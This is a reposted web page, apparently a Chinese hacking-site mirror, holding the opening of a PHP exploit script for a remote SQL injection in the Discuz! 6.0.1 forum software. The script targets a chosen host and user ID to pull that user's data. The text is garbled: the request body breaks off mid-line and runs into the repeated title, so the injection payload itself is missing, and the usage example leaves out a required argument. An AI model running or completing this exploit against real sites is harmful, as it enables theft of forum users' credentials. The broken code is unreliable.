Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
时间:
2016-02-07 15:55:12
阅读:
249
评论:
收藏:
0
[点我收藏+]
<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");
if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}
$content ="action=search&searchid=22Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
原文:http://www.jb51.net/hack/5592.html
